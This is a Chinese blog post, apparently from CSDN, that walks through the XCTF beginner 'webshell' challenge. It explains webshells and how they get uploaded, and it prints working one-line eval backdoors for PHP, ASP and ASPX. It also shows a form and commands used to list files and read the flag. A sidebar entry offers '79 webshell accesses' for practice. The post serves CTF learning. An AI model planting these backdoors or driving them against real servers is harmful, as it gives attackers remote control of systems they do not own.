【XCTF 攻防世界】WEB 新手练习区 webshell

最新推荐文章于 2022-09-20 21:14:12 发布
最新推荐文章于 2022-09-20 21:14:12 发布
阅读量772 收藏 1
点赞数 1
分类专栏: CTF刷题 WEB 文章标签: php web 安全 html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45844670/article/details/107900144
版权

题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=0&page=1

首先,我们需要知道什么是webshell

webshell(分类为远程访问木马)是作为一个基于网络的实现的网络安全威胁shell概念。
Webshell可以上传到Web服务器,以允许远程访问Web服务器,例如Web服务器的文件系统。
Webshell的独特之处在于它使用户能够通过充当命令行界面的Web浏览器访问Web服务器。用户可以使用Web浏览器通过万维网访问远程计算机在任何类型的系统上,无论是台式计算机还是带有Web浏览器的手机,都可以在远程系统上执行任务。主机或客户端都不需要命令行环境。

贴一个大牛的链接:Webshell和一句话木马

简单的说webshell就是web后门,比如php,asp木马后门。黑客在入侵了一个网站后,常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。

Web shell通过Web应用程序中的漏洞或弱服务器安全配置上传,包括以下内容:

  1. SQL注入 ;
  2. 应用程序和服务中的漏洞(例如NGINX等Web服务器软件或WordPress等内容管理系统应用程序);
  3. 文件处理和上传漏洞(例如限制可上传的文件类型);
  4. 远程文件包含(RFI)和本地文件包含(LFI)漏洞;
  5. 远程代码执行 ;
  6. 暴露的管理界面;
  7. 跨站脚本

小马(一句话木马)就不容易被识别,隐蔽性高

一句话木马

简单来说一句话木马就是通过向服务端提交一句简短的代码来达到向服务器插入木马并最终获
得webshell的方法。

一些不同脚本语言的一句话木马

php一句话木马:  <?php @eval($_POST[value]); ?>
asp一句话木马:  <%eval request ("value")%><% execute(request("value")) %>   
aspx一句话木马: <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>

我们有两种方法来获取网页的webshell:
第一种,直接使用工具。Cknife
在这里插入图片描述
在下面选择语言和编码方式,点击编辑

之后右键即可进行网站文件管理
在这里插入图片描述
第二种方式,修改HTML代码提交一个shell的变量,变量值是webshell命令​​​​
从别人的wp看到的一种方法

​​​​​​​<form action="http://111.198.29.45:36317/index.php" method="post">
    <input type="text" name="shell">
    <input type="submit" value="提交">
</form>

在这里插入图片描述
在这里插入图片描述

提交命令

print_r(scandir(getcwd()));

在这里插入图片描述

在网站目录下发现了flag.txt

提交命令

print_r(show_source('flag.txt'));

在这里插入图片描述

还是直接使用工具更方便一点

Kal1
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
送79个webshell权限
08-13
送79个webshell权限 供小黑们练习
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
攻防世界web新手webshell
star_feather的博客
05-20 653
打开场景后发现页面上有一句话木马,密码是shell, 打开中国蚁剑等扫描工具,添加地址输入密码扫描(以下一蚁剑为例): 添加场景URL(即网址),填写密码: 打开,发现有flag的txt文件,打开即得flag: ...
xctf攻防世界Web新手练习
weixin_53857548的博客
12-24 311
项目场景:view_source 提示:题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 题目场景: http://220.249.52.134:56105 问题描述: 提示:进入页面后显示:“FLAG is not here”,鼠标右键菜单栏不能正常触发 解决方案: 提示:通过在题目地址前添加view-source:访问网页源码,得到flag <!DOCTYPE html> <html lang="en"> <head>
攻防世界web新手(webshell与weak_auth)
weixin_51706044的博客
03-13 426
文章目录一.webshell二、weak_auth 一.webshell 打开之后可以看到: 本题考察的是一句话木马以及工具的使用 这里我们可以使用蚁剑操作 添加后点击地址 可以看到flag就在这里面 二、weak_auth 根据题目提示本题考查的弱密码 可以看到登录名:admin,如果熟知弱密码的话可以随意尝试说不定就是答案哦! 在这里我们选择Brup进行爆破 发送后打开Intruder进行爆破 通过长度的不同可以发现密码为:123456 账号:admin 密码:123456登录后打开得到
攻防世界web新手练习010 webshell
weixin_43545225的博客
09-12 581
攻防世界web新手练习010 webshell 难度系数:2 题目描述: 小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 题目场景: http://111.200.241.244:63533/ 解题思路 遇见web题目,习惯性F12看一下控制台。 嗯,毫无线索。 题目提示“ webshellwebshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一
XCTF-RE】新手练习-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-RE】新手练习-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XCTF-RE】新手练习-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
XCTF-RE】新手练习-getit
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/aba4sn
xctf-webshell
rrorb的博客
01-12 351
打开网页界面如下: 百度一下什么是webshell webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。 顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取...
XCTF WEB webshell
无限迭代中......
06-30 1685
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070 版本一 题解:修改HTML代码提交一个shell的变量 变量值是webshell命令 ​​​​​​​<form action="http://111.198.29.45:36317/index.php" meth...
xctfwebshell
recordliu的博客
01-28 370
这里一句话木马已经上传了 我们选择用菜刀来访问,菜刀可以去ctf工具下载。 右键,添加,然后把地址输入进去,类型选择php,添加 然后双击进入添加的,查看文件有flag,选择双击, flag出现, ...
攻防世界-WEB-新手-webshell
weixin_31610083的博客
10-07 1172
【题目描述】 小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 【附件】 在线场景 【过程及思路】 打开在线场景后出现如下字样: 先看一些基础概念。 什么是webshellwebshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将...
WebShell文件上传漏洞练习
weixin_47493074的博客
09-20 271
WebShell文件上传漏洞练习
11.XCTF webshell
山兔的博客
09-16 272
小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 一打开网站,就看到 你会使用webshell吗? <?php @eval($_POST['shell']);?> 这不就是一句话连接吗, http://111.200.241.244:62328/index.php 连接成功,获得flag。 ...
攻防世界 Web新手练习题解
weixin_45208900的博客
06-07 829
本质为简化记录
XCTF (新手练习) Wed 之 webshell
qq_43230425的博客
09-22 421
webshell 题目如下图: 附上题目链接:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070&page=1   这道题主要在于解题工具的准备,解题步骤很简单。工具可以用中国菜刀或者中国蚁剑,但是中国菜刀很容易下载到开有后门的恶意软件,故我用的是中国蚁剑。 (下载链接:中国蚁剑;下载和使用说明) 工具准备好之后,以下为解题步骤: 第一步: 打开蚁剑后直接在空白处右键点击“添加
XCTF攻防世界web新手练习_ 8_webshell
热门推荐
silence1_的博客
04-29 1万+
XCTF攻防世界web新手练习webshell 题目 题目为webshell,描述中,重点:把它放在了index.php里 打开题目,你会使用webshell吗?并写出了一句话,从中很容易看出这个一句话的密码是" shell " 顺理成章,打开菜刀,添加,输入url,输如密码,连接成功, 一气呵成! 菜刀连接成功后可以直接对服务器文件进行操作,看到flag.txt,打开获得flag! ...
攻防世界pwn新手题答案
最新发布
08-10
- *1* *2* [xctf攻防世界pwn基础题解(新手食用)](https://blog.csdn.net/lplp9822/article/details/89735167)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值